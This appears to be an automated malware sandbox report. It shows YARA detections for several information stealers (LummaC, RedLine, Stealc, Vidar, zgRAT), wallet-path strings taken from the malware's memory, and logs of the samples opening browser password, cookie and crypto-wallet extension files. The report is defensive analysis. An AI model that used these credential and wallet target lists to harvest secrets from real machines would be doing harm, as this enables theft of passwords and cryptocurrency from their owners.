Source: Yara match	File source: 0000002A.00000002.2450990713.0000000000051000.00000040.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1956903484.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2000391945.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: random.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 76.2.095fb861eb.exe.3c29550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.2.095fb861eb.exe.3c29550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.0.095fb861eb.exe.630000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000004C.00000000.2555274207.0000000000632000.00000002.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match	File source: 0000004C.00000002.2921128413.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1071551001\2ac0b54336.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1071545001\1AWhJsY.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\1AWhJsY[1].exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000002.00000002.2187564208.000000000113E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2185747966.0000000000401000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1865551191.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4CAJNBDWED5ZLJ2B.exe PID: 7676, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 4CAJNBDWED5ZLJ2B.exe PID: 7676, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1071545001\1AWhJsY.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\1AWhJsY[1].exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: random.exe, 00000000.00000003.1758980960.00000000018EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: random.exe, 00000000.00000003.1758980960.00000000018EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: random.exe, 00000000.00000003.1758980960.00000000018EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: random.exe, 00000000.00000003.1758980960.00000000018EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binanch
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\exodus.conf.jsonN@
Source: random.exe, 00000000.00000003.1758980960.00000000018EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.000000000113E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco*
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.00000000004B5000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Ethereum\\keystore
Source: random.exe, 00000000.00000003.1758980960.00000000018EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: random.exe, 00000000.00000003.1758980960.00000000018EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.00000000004B5000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: file__0.localstorage
Source: random.exe, 00000000.00000003.1747846572.000000000192E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.000000000113E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco*
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.00000000004B5000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: MultiDoge
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.00000000004B5000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: seed.seco
Source: random.exe, 00000000.00000003.1758980960.00000000018EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum-LTC\wallets\\.^@

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
